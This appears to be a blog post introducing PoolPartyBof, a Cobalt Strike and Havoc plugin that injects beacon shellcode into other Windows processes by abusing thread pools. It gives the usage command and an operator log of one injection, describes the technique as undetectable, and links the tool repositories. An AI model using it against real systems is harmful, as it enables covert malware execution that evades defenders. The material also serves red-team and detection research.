Preface
At Black Hat EU 2023, security researcher @Alon Leviev presented a collection of process injection techniques that abuse Windows thread pools and are described as completely undetectable, titled: The Pool Party You Will Never Forget: New Process Injection Techniques Using Windows Thread Pools. The presentation slides are available at the following address.
https://www.blackhat.com/eu-23/briefings/schedule/#the-pool-party-you-will-never-forget-new-process-injection-techniques-using-windows-thread-pools-35446
Plugin Overview
The author implemented a BOF (Beacon Object File) based on the PoolParty process injection technique (abuse of Windows thread pools) by @SafeBreach and @0xDeku; it can be used in Havoc and Cobalt Strike.
Insert a TP_IO work item into the target process's thread pool.
Insert a TP_ALPC work item into the target process's thread pool.
Insert a TP_JOB work item into the target process's thread pool.
Insert a TP_DIRECT work item into the target process's thread pool.
Insert a TP_TIMER work item into the target process's thread pool.
Plugin Usage
PoolPartyBof <Process ID> <Path To Shellcode> <Variant>
PoolPartyBof 2136 /tmp/beacon_x64.bin 4
[*] Opening 2136 and running PoolParty with /tmp/beacon_x64.bin shellcode!
[+] host called home, sent: 314020 bytes
[+] received output:
[INFO] Shellcode Size: 307200 bytes
[+] received output:
[INFO] Starting PoolParty attack against process id: 2136
[+] received output:
[INFO] Retrieved handle to the target process: 0000000000000670
[+] received output:
[INFO] Hijacked worker factory handle from the target process: 000000C96E0FF5B8
[+] received output:
[INFO] Hijacked timer queue handle from the target process: 000000C96E0FF5B8
[+] received output:
[INFO] Allocated shellcode memory in the target process: 00000290C91B0000
[+] received output:
[INFO] Written shellcode to the target process
[+] received output:
[INFO] Retrieved target worker factory basic information
[+] received output:
[INFO] Created TP_TIMER structure associated with the shellcode
[+] received output:
[INFO] Allocated TP_TIMER memory in the target process: 00000290C9200000
[+] received output:
[INFO] Written the specially crafted TP_TIMER structure to the target process
[+] received output:
[INFO] Modified the target process's TP_POOL timer queue WindowsStart and Windows End to point to the specially crafted TP_TIMER
[+] received output:
[INFO] Set the timer queue to expire to trigger the dequeueing TppTimerQueueExpiration
[+] received output:
[INFO] PoolParty attack completed.
The BOF can further be used together with the Process Injection Hooks provided in Cobalt Strike; Rastamouse also has an excellent blog post on this.
Download
https://github.com/0xEr3bus/PoolPartyBof
https://github.com/SafeBreach-Labs/PoolParty
Disclaimer: The programs (methods) covered in this article may be offensive in nature and are provided solely for security research and educational purposes. Readers who use this information for any other purpose bear full legal and joint liability; this site assumes no legal or joint liability. If you have any questions, contact us by e-mail (preferably from a corporate or otherwise valid mailbox so the message is not blocked; contact details are on the home page).